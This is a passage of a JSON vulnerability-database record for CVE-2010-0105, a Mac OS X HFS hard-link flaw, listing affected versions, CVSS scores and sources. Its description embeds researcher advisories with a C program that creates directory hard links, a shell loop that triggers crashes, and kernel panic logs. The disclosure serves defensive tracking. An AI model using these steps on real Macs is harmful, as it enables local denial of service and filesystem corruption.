      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201004-0093",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "mac os x",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "apple",
        "version": "10.6.3"
      },
      {
        "model": "mac os x",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "apple",
        "version": "10.6.2"
      },
      {
        "model": "mac os x",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "apple",
        "version": "10.6.4"
      },
      {
        "model": "mac os x",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "apple",
        "version": "10.6.1"
      },
      {
        "model": "mac os x",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "apple",
        "version": "10.5.8"
      },
      {
        "model": "mac os x",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "apple",
        "version": "10.6.0"
      },
      {
        "model": "mac os x",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "apple",
        "version": "v10.5.8"
      },
      {
        "model": "mac os x",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "apple",
        "version": "v10.6 to  v10.6.4"
      },
      {
        "model": "mac os x server",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "apple",
        "version": "v10.5.8"
      },
      {
        "model": "mac os x server",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "apple",
        "version": "v10.6 to  v10.6.4"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.6"
      },
      {
        "model": "mac os server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.6"
      },
      {
        "model": "mac os",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.6.5"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.6.1"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.5.6"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.5.3"
      },
      {
        "model": "mac os server",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.6.5"
      },
      {
        "model": "mac os server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.6.1"
      },
      {
        "model": "mac os server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.5.6"
      },
      {
        "model": "mac os server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.5.3"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.5.8"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.5.5"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.5"
      },
      {
        "model": "mac os server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.5.8"
      },
      {
        "model": "mac os server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.5.5"
      },
      {
        "model": "mac os server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.5"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.5.4"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.6.2"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.5.7"
      },
      {
        "model": "mac os server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.5.4"
      },
      {
        "model": "mac os server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.6.2"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.5.2"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.5.1"
      },
      {
        "model": "mac os server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.5.7"
      },
      {
        "model": "mac os server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.5.2"
      },
      {
        "model": "mac os server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.5.1"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.6.4"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.6.3"
      },
      {
        "model": "mac os server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.6.4"
      },
      {
        "model": "mac os server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.6.3"
      }
    ],
    "sources": [
      {
        "db": "BID",
        "id": "39658"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2010-002403"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201004-447"
      },
      {
        "db": "NVD",
        "id": "CVE-2010-0105"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "cpe_match": [
              {
                "cpe22Uri": "cpe:/o:apple:mac_os_x",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/o:apple:mac_os_x_server",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2010-002403"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Maksymilian Arciemowicz max@jestsuper.pl",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201004-447"
      }
    ],
    "trust": 0.6
  },
  "cve": "CVE-2010-0105",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "accessComplexity": "LOW",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "nvd@nist.gov",
            "availabilityImpact": "COMPLETE",
            "baseScore": 4.9,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 3.9,
            "id": "CVE-2010-0105",
            "impactScore": 6.9,
            "integrityImpact": "NONE",
            "severity": "MEDIUM",
            "trust": 1.8,
            "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:C",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "COMPLETE",
            "baseScore": 4.9,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 3.9,
            "id": "VHN-42710",
            "impactScore": 6.9,
            "integrityImpact": "NONE",
            "severity": "MEDIUM",
            "trust": 0.1,
            "vectorString": "AV:L/AC:L/AU:N/C:N/I:N/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [],
        "severity": [
          {
            "author": "nvd@nist.gov",
            "id": "CVE-2010-0105",
            "trust": 1.0,
            "value": "MEDIUM"
          },
          {
            "author": "NVD",
            "id": "CVE-2010-0105",
            "trust": 0.8,
            "value": "Medium"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201004-447",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "VULHUB",
            "id": "VHN-42710",
            "trust": 0.1,
            "value": "MEDIUM"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-42710"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2010-002403"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201004-447"
      },
      {
        "db": "NVD",
        "id": "CVE-2010-0105"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "The hfs implementation in Apple Mac OS X 10.5.8 and 10.6.x before 10.6.5 supports hard links to directories and does not prevent certain deeply nested directory structures, which allows local users to cause a denial of service (filesystem corruption) via a crafted application that calls the mkdir and link functions, related to the fsck_hfs program in the diskdev_cmds component. Apple Mac OS X is prone to a local denial-of-service vulnerability. \nExploiting this issue allows local, unprivileged users to crash affected system, denying further service to legitimate users. \nApple Mac OS X 10.6.2 and 10.6.3 are affected; other versions may also be vulnerable. Apple Mac is the operating system used by the Apple family of computers. MacOSX/XNU HFS Multiple Vulnerabilities\nMaksymilian Arciemowicz\nhttp://cxsecurity.com/\nhttp://cifrex.org/\n\n===================\n\nOn November 8th, I\u0027ve reported vulnerability in hard links for HFS+\n(CVE-2013-6799)\n\nhttp://cxsecurity.com/issue/WLB-2013110059\n\nThe HFS+ file system does not apply strict privilege rules during the\ncreating of hard links. The ability to create hard links to directories is\nwrong implemented and such an issue is affecting os versions greater or\nequal to 10.5. Officially Apple allows you to create hard links only for\nyour time machine. \u003csee wiki\u003e Vulnerability CVE-2013-6799 (incomplete fix\nfor CVE-2010-0105) allow to create hard link to directory and the number of\nhard links may be freely high. To create N hard links, you must use a\nspecial algorithm which creates links from the top of the file system tree. \nThis means that first we create the directory structure and once created we\nneed to go from up to down by creating hard links. The last time I\u0027ve\nmentioned of the possibility of a kernel crash by performing the \u0027ls\u0027\ncommand. This situation occurs in conjunction with the \u0027find\u0027 application. \n\nCommands such as \u0027ls\u0027 behave in unexpected ways. Apple are going find this\ncrash point in code. To create huge hard links structure, use this code\n\nhttp://cert.cx/stuff/l2.c\n\n-----------------------------------\nh1XSS:tysiak cx$ uname -a\nDarwin 000000000000000.home 13.1.0 Darwin Kernel Version 13.1.0: Thu Jan 16\n19:40:37 PST 2014; root:xnu-2422.90.20~2/RELEASE_X86_64 x86_64\nh1xss:tysiak cx$ gcc -o l2 l2.c\nh1xss:tysiak cx$ ./l2 1000\n... \nh1xss:tysiak cx$ cat loop.sh\n#!/bin/bash\nwhile [ 1 ] ; do\nls -laR B \u003e /dev/null\ndone\n\nh1xss:tysiak cx$ sh ./loop.sh\nls: B: No such file or directory\nls: X1: No such file or directory\n... \nls: X8: Bad address\nls: X1: Bad address\nls: X2: Bad address\n... \nls: X8: No such file or directory\n./loop.sh: line 4:  8816 Segmentation fault: 11  ls -laR B \u003e /dev/null\n./loop.sh: line 4:  8818 Segmentation fault: 11  ls -laR B \u003e /dev/null\nls: B: No such file or directory\nls: X1: No such file or directory\nls: X2: No such file or directory\n... \nls: X1: No such file or directory\nls: X2: No such file or directory\n-----------\n... \n-----------\nFeb  9 21:16:38 h1xss.home ReportCrash[9419]: Saved crash report for\nls[9418] version 230 to\n/Users/freak/Library/Logs/DiagnosticReports/ls_2014-02-09-211638_h1XSS.crash\n-----------\n\nThat what we can see here is unexpected behavior of LS command. LS process\nis also affected for infinite loop (recursion?). \n\n-----------\nh1xss:tysiak cx$ ps -fp 8822\n  UID   PID  PPID   C STIME   TTY           TIME CMD\n  501  8822  8810   0  7:36   ttys002   62:19.65 ls -laR B\n-----------\n\nor used parallely with (find . \u003e /dev/null) command cause a kernel crash\n\n-----------\nMon Mar 31 20:30:41 2014\npanic(cpu 0 caller 0xffffff80044dbe2e): Kernel trap at 0xffffff8004768838,\ntype 13=general protection, registers:\nCR0: 0x0000000080010033, CR2: 0xffffff8122877004, CR3: 0x0000000001a5408c,\nCR4: 0x00000000001606e0\nRAX: 0xffffff802bc148a0, RBX: 0xdeadbeefdeadbeef, RCX: 0x0000000000008000,\nRDX: 0x0000000000000000\nRSP: 0xffffff8140d9b990, RBP: 0xffffff8140d9b9a0, RSI: 0x0000000000000018,\nRDI: 0xffffff802f23bcd0\nR8:  0xffffff8140d9bc1c, R9:  0xffffff802f26e960, R10: 0xffffff8140d9ba2c,\nR11: 0x0000000000000f92\nR12: 0xffffff801ba1a008, R13: 0xffffff8140d9bb20, R14: 0xffffff802f23bcd0,\nR15: 0xffffff802f26e960\nRFL: 0x0000000000010282, RIP: 0xffffff8004768838, CS:  0x0000000000000008,\nSS:  0x0000000000000010\nFault CR2: 0xffffff8122877004, Error code: 0x0000000000000000, Fault CPU:\n0x0\n\nBacktrace (CPU 0), Frame : Return Address\n0xffffff811eee8c50 : 0xffffff8004422fa9\n\nBSD process name corresponding to current thread: ls\n-----------\n\nXNU is the computer operating system kernel that Apple Inc. acquired and\ndeveloped for use in the Mac OS X operating system and released as free and\nopen source software as part of the Darwin operating system. We can try to\nsee HFS implementation code. Let\u0027s start static code analysys using\ncifrex.org tool!\n\n-1.---------------------------------------------------------\nUnchecked Return Value to NULL Pointer Dereference in hfs_vfsops.c\n\nCode:\nhttp://opensource.apple.com/source/xnu/xnu-2422.1.72/bsd/hfs/hfs_vfsops.c\n\n--- hfs_vfsops.c ----------------------------\n/*\n * HFS filesystem related variables. \n */\nint\nhfs_sysctl(int *name, __unused u_int namelen, user_addr_t oldp, size_t\n*oldlenp,\nuser_addr_t newp, size_t newlen, vfs_context_t context)\n{\n... \n       if ((newlen \u003c= 0) || (newlen \u003e MAXPATHLEN))\n            return (EINVAL);\n\n        bufsize = MAX(newlen * 3, MAXPATHLEN);\n        MALLOC(filename, char *, newlen, M_TEMP, M_WAITOK);\n        if (filename == NULL) { \u003c=====================================\nfilename CHECK\n            error = ENOMEM;\n            goto encodinghint_exit;\n        }\n        MALLOC(unicode_name, u_int16_t *, bufsize, M_TEMP, M_WAITOK);\n        if (filename == NULL) { \u003c======================================\ndouble CHECK?\n            error = ENOMEM;\n            goto encodinghint_exit;\n        }\n\n        error = copyin(newp, (caddr_t)filename, newlen);\n        if (error == 0) {\n            error = utf8_decodestr((u_int8_t *)filename, newlen - 1,\nunicode_name,\n                                   \u0026bytes, bufsize, 0, UTF_DECOMPOSED);\n            if (error == 0) {\n                hint = hfs_pickencoding(unicode_name, bytes / 2);\n                error = sysctl_int(oldp, oldlenp, USER_ADDR_NULL, 0,\n(int32_t *)\u0026hint);\n            }\n        }\n--- hfs_vfsops.c----------------------------\n\nTwice checking of \u0027filename\u0027 has no sense. Probably \u0027unicode_name\u0027 should\nbe checked in second condition. \n\n\n-2.---------------------------------------------------------\nPossible Buffer Overflow in resource fork (hfs_vnops.c)\n\nUnverified value returned by snprintf() may be bigger as a declared buffer\n(MAXPATHLEN). \n\n\nhttps://developer.apple.com/library/mac/documentation/Darwin/Reference/ManPages/man3/snprintf.3.html\n---\nThe snprintf() and vsnprintf() functions will write at most n-1 of the\ncharacters printed into the out-put output\n     put string (the n\u0027th character then gets the terminating `\\0\u0027); if the\nreturn value is greater than or\n     equal to the n argument, the string was too short and some of the\nprinted characters were discarded. \n     The output is always null-terminated. \n---\n\n\nCode:\nhttp://opensource.apple.com/source/xnu/xnu-2422.1.72/bsd/hfs/hfs_vnops.c\n\n--- hfs_vnops.c ----------------------------\n... \n/*\n * hfs_vgetrsrc acquires a resource fork vnode corresponding to the cnode\nthat is\n * found in \u0027vp\u0027.  The rsrc fork vnode is returned with the cnode locked\nand iocount\n * on the rsrc vnode. \n *\n ... \n */\n\nint\nhfs_vgetrsrc(struct hfsmount *hfsmp, struct vnode *vp, struct vnode **rvpp,\nint can_drop_lock, int error_on_unlinked)\n{\n\n... \n\n/*\n * Supply hfs_getnewvnode with a component name. \n */\ncn.cn_pnbuf = NULL;\nif (descptr-\u003ecd_nameptr) {\n            MALLOC_ZONE(cn.cn_pnbuf, caddr_t, MAXPATHLEN, M_NAMEI,\nM_WAITOK);\n            cn.cn_nameiop = LOOKUP;\n            cn.cn_flags = ISLASTCN | HASBUF;\n            cn.cn_context = NULL;\n            cn.cn_pnlen = MAXPATHLEN;\n            cn.cn_nameptr = cn.cn_pnbuf;\n            cn.cn_hash = 0;\n            cn.cn_consume = 0;\n            cn.cn_namelen = snprintf(cn.cn_nameptr, MAXPATHLEN,\n\u003c================\n                         \"%s%s\", descptr-\u003ecd_nameptr,\n                         _PATH_RSRCFORKSPEC);\n        }\n        dvp = vnode_getparent(vp);\n        error = hfs_getnewvnode(hfsmp, dvp, cn.cn_pnbuf ? \u0026cn : NULL,\n\u003c================\n                                descptr, GNV_WANTRSRC | GNV_SKIPLOCK,\n\u0026cp-\u003ec_attr,\n                                \u0026rsrcfork, \u0026rvp, \u0026newvnode_flags);\n\n--- hfs_vnops.c ----------------------------\n\nPattern is \u0027%s%s\u0027 where sum of length descptr-\u003ecd_nameptr and\n_PATH_RSRCFORKSPEC may be bigger as a declared buffer size (MAXPATHLEN). \nSize of descptr-\u003ecd_nameptr is MAXPATHLEN and value _PATH_RSRCFORKSPEC is\n\n  #define _PATH_RSRCFORKSPEC     \"/..namedfork/rsrc\"\n\nwhere length is 17 chars. Possible up to 17 chars overflow here?. \n\nNow let\u0027s see hfs_getnewvnode function\n\nhttp://opensource.apple.com/source/xnu/xnu-2422.1.72/bsd/hfs/hfs_cnode.c\n\n--- hfs_cnode.c ----------------------------\nhfs_getnewvnode(\n    struct hfsmount *hfsmp,\n    struct vnode *dvp,\n    struct componentname *cnp, \u003c======== WATCH THIS\n    struct cat_desc *descp,\n    int flags,\n    struct cat_attr *attrp,\n    struct cat_fork *forkp,\n    struct vnode **vpp,\n    int *out_flags)\n{\n... \n                if ((*vpp != NULL) \u0026\u0026 (cnp)) {\n                    /* we could be requesting the rsrc of a hardlink\nfile... */\n                    vnode_update_identity (*vpp, dvp, cnp-\u003ecn_nameptr,\ncnp-\u003ecn_namelen, cnp-\u003ecn_hash, \u003c== NAMELEN HERE\n                            (VNODE_UPDATE_PARENT | VNODE_UPDATE_NAME));\n... \n--- hfs_cnode.c ----------------------------\n\nand call to vnode_update_indentity()\n\nhttp://opensource.apple.com/source/xnu/xnu-2422.1.72/bsd/vfs/vfs_cache.c\n\n\n--- vfs_cache.c ----------------------------\nvoid\nvnode_update_identity(vnode_t vp, vnode_t dvp, const char *name, int\nname_len, uint32_t name_hashval, int flags)\n{\n... \n    if ( (flags \u0026 VNODE_UPDATE_NAME) ) {\n        if (name != vp-\u003ev_name) {\n            if (name \u0026\u0026 *name) {\n                if (name_len == 0)\n                    name_len = strlen(name);\n                tname = vfs_addname(name, name_len, name_hashval, 0); \u003c==\nNAMELEN HERE\n            }\n        } else\n            flags \u0026= ~VNODE_UPDATE_NAME;\n    }\n... \nconst char *\nvfs_addname(const char *name, uint32_t len, u_int hashval, u_int flags)\n{\n    return (add_name_internal(name, len, hashval, FALSE, flags));  \u003c== CALL\n\n}\n--- vfs_cache.c ----------------------------\n\nAnd invalid memory reference in add_name_internal()\n\n--- vfs_cache.c ----------------------------\nstatic const char *\nadd_name_internal(const char *name, uint32_t len, u_int hashval, boolean_t\nneed_extra_ref, __unused u_int flags)\n{\n    struct stringhead *head;\n    string_t          *entry;\n    uint32_t          chain_len = 0;\n    uint32_t      hash_index;\n        uint32_t      lock_index;\n    char              *ptr;\n\n    /*\n     * if the length already accounts for the null-byte, then\n     * subtract one so later on we don\u0027t index past the end\n     * of the string. \n     */\n    if (len \u003e 0 \u0026\u0026 name[len-1] == \u0027\\0\u0027) { \u003c===== INVALID MEMORY REFERENCE\n        len--;\n    }\n    if (hashval == 0) {\n        hashval = hash_string(name, len);\n    }\n--- vfs_cache.c ----------------------------\n\n\n-3.---------------------------------------------------------\nUnchecked Return Value to NULL Pointer Dereference hfs_catalog.c and not\nonly\n\nPlease pay attention that a buffer length check (stored in some variable)\nshould be performed; also return from *alloc() function family should be\nverified for possible NULL pointers. \nHere are a few FALSE / POSITIVE examples. \n\nhttp://opensource.apple.com/source/xnu/xnu-2422.1.72/bsd/hfs/hfs_catalog.c\n\n--- hfs_catalog.c ----------------------------\n /*\n * builddesc - build a cnode descriptor from an HFS+ key\n */\nstatic int\nbuilddesc(const HFSPlusCatalogKey *key, cnid_t cnid, u_int32_t hint,\nu_int32_t encoding,\n    int isdir, struct cat_desc *descp)\n{\n    int result = 0;\n    unsigned char * nameptr;\n    size_t bufsize;\n    size_t utf8len;\n    unsigned char tmpbuff[128];\n\n    /* guess a size... */\n    bufsize = (3 * key-\u003enodeName.length) + 1;\n    if (bufsize \u003e= sizeof(tmpbuff) - 1) { \u003c============================\n        MALLOC(nameptr, unsigned char *, bufsize, M_TEMP, M_WAITOK); \u003c=\nMALLOC FAIL\n    } else {\n        nameptr = \u0026tmpbuff[0];\n    }\n\n    result = utf8_encodestr(key-\u003enodeName.unicode,\n            key-\u003enodeName.length * sizeof(UniChar),\n            nameptr, (size_t *)\u0026utf8len, \u003c============================\n\n... \n    maxlinks = MIN(entrycnt, (u_int32_t)(uio_resid(uio) /\nSMALL_DIRENTRY_SIZE));\nbufsize = MAXPATHLEN + (maxlinks * sizeof(linkinfo_t)) + sizeof(*iterator);\nif (extended) {\nbufsize += 2*sizeof(struct direntry);\n}\nMALLOC(buffer, void *, bufsize, M_TEMP, M_WAITOK);\n\u003c============================\nbzero(buffer, bufsize);\n... \nFREE(nameptr, M_TEMP);\nMALLOC(nameptr, unsigned char *, bufsize, M_TEMP, M_WAITOK); \u003c==============\n\nresult = utf8_encodestr(key-\u003enodeName.unicode,\n                        key-\u003enodeName.length * sizeof(UniChar),\n                        nameptr, (size_t *)\u0026utf8len,\n                        bufsize, \u0027:\u0027, 0);\n}\n ... \ncnp = (const CatalogName *)\u0026ckp-\u003ehfsPlus.nodeName;\nbufsize = 1 + utf8_encodelen(cnp-\u003eustr.unicode,\n                             cnp-\u003eustr.length * sizeof(UniChar),\n                             \u0027:\u0027, 0);\nMALLOC(new_nameptr, u_int8_t *, bufsize, M_TEMP, M_WAITOK); \u003c========\nresult = utf8_encodestr(cnp-\u003eustr.unicode,\n                        cnp-\u003eustr.length * sizeof(UniChar),\n                        new_nameptr, \u0026tmp_namelen, bufsize, \u0027:\u0027, 0);\n\n--- hfs_catalog.c ----------------------------\n\nThe above examples does not look nice, too. Are you among them is the crux\nof the problem applications and kernel crash?\nI informed Apple of those possible errors, it has passed more than a month\nand I still have not received any comment nor solution. \n\n\n--- 1. References ---\nhttp://cxsecurity.com/issue/WLB-2014040027\nhttp://cxsecurity.com/cveshow/CVE-2013-6799/\nhttp://cxsecurity.com/cveshow/CVE-2010-0105/\n\n\n--- 2. Greetz ---\nKacper George and Michal\n\n\n--- 3. Credit ---\nMaksymilian Arciemowicz\nhttp://cxsecurity.com/\nhttp://cifrex.org/\nhttp://cert.cx/\n\nBest regards,\nCXSEC TEAM\nhttp://cxsec.org/\n\n\n. Apple MacOSX 10.9 Hard Link Memory Corruption \n\nDate: 08.11.2013\nhttp://cxsecurity.com/\nhttp://cvemap.org/\n\nURL: http://cxsecurity.com/issue/WLB-2013110059\n\n- 0. Description ---\n\nIn most UNIX-like systems a hard link to a directory is only reserved for the \u0027root\u0027 user when possible at all. \nIn MacOSX 10.6 there was one such a vulnerability (CVE-2010-0105) causing the filesystem being resulting corrupted; the creation of many hard links was the cause. \nA notable exception to this is Mac OS X v10.5 (Leopard) and newer, \nwhich use hard links on directories for the Time Machine backup mechanism only.\u0027\n\n\u0027Only for the Time Machine\u0027 is not True. Let\u0027s see quick PoC\n\nA plain program performing a system call (link)\n----------------------------------------------\nmac-cxs-XK:pochd XK$ cat test.c\n#include \u003cstdio.h\u003e\n#include \u003cunistd.h\u003e\n\nvoid usage(const char* program)\n{\n    const char* message = \" [src_dir] [target_dir]\";\n\tfprintf(stderr, \"%s%s\\n\", program, message);\n}\n\nint main(int argc, char* argv[]) {\n    if (argc!=3) {\n        usage(argv[0]);\n\t    return 1;\n    }\n    \n    int ret = link(argv[1],argv[2]);\n    \n    fprintf(stderr,\"link(3) return= %d\\n\", ret);\n\n    return ret;\n}\n\nmac-cxs-XK:pochd XK$ gcc -o test test.c\nmac-cxs-XK:pochd XK$ ls\ntest\ttest.c\nmac-cxs-XK:pochd XK$ mkdir DIR1\nmac-cxs-XK:pochd XK$ ./test DIR1 Hardlink1\nlink(3) return= -1\nmac-cxs-XK:pochd XK$ mkdir DIR1/DIR2\nmac-cxs-XK:pochd XK$ ./test DIR1/DIR2 Hardlink2\nlink(3) return= 0\nmac-cxs-XK:pochd XK$ cd DIR1\nmac-cxs-XK:DIR1 XK$ mkdir DIR2/DIR3\nmac-cxs-XK:DIR1 XK$ ../test DIR2/DIR3 Hardlink3\nlink(3) return= 0\nmac-cxs-XK:DIR1 XK$ cd DIR2\nmac-cxs-XK:DIR2 XK$ mkdir DIR3/DIR4\nmac-cxs-XK:DIR2 XK$ ../../test DIR3/DIR4 Hardlink4\nlink(3) return= -1\n----------------------------------------------\n\n\nHardlink1 and Hardlink4 failed instead Hardlink2 and Hardlink3 did not; so which may be the cause?\nIn my opinion we should recognize it as a security flaw and if Apple is not going to fix this vulnerability then someone should change the Wikipedias at least. \n\nOperation (functionality) of hard links differs from those described in \"Unix Internals: The New Frontiers\" book (by Uresh Vahalia)\nOld unix standards simply prevent to create any hard link to whatever directory for any user (root included). \n\nIs that new CWE-DesignError vulnerability or new UNIX style?\n\nThere may be many possible bad consequences coming out from wrong \u0027hard link\u0027 handling. We will not yet public full description of this problem but we do know that it exists and that it may exhaust kernel/system resources,\nit may cause application crashes or kernel panics. Let\u0027s wait for new MacOSX version. \nA/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A:\ntotal 0\nProcess 14413 stopped\n* thread #1: tid = 0x90ba, 0x00007fff948f7812 libsystem_c.dylib`strlen + 18, queue = \u0027com.apple.main-thread, stop reason = EXC_BAD_ACCESS (code=1, address=0xffb21290)\n    frame #0: 0x00007fff948f7812 libsystem_c.dylib`strlen + 18\nlibsystem_c.dylib`strlen + 18:\n-\u003e 0x7fff948f7812:  pcmpeqb (%rdi), %xmm0\n   0x7fff948f7816:  pmovmskb %xmm0, %esi\n   0x7fff948f781a:  andq   $15, %rcx\n   0x7fff948f781e:  orq    $-1, %rax\n(lldb) \n(lldb) bt\n* thread #1: tid = 0x90ba, 0x00007fff948f7812 libsystem_c.dylib`strlen + 18, queue = \u0027com.apple.main-thread, stop reason = EXC_BAD_ACCESS (code=1, address=0xffb21290)\n    frame #0: 0x00007fff948f7812 libsystem_c.dylib`strlen + 18\n.. \n\n\nDoes the kernel panic correspond to \u0027ls\u0027 ? More details soon. Credit ---\nMaksymilian Arciemowicz ( http://cert.cx/ )\n\nFrist CVE\u0026CWE compatible bugtraq\nhttp://cxsecurity.com/\nhttp://cvemap.org/\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2010-0105"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2010-002403"
      },
      {
        "db": "BID",
        "id": "39658"
      },
      {
        "db": "VULHUB",
        "id": "VHN-42710"
      },
      {
        "db": "PACKETSTORM",
        "id": "126039"
      },
      {
        "db": "PACKETSTORM",
        "id": "123948"
      }
    ],
    "trust": 2.16
  },
  "exploit_availability": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "reference": "https://www.scap.org.cn/vuln/vhn-42710",
        "trust": 0.1,
        "type": "unknown"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-42710"
      }
    ]
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2010-0105",
        "trust": 3.0
      },
      {
        "db": "BID",
        "id": "39658",
        "trust": 2.8
      },
      {
        "db": "SECTRACK",
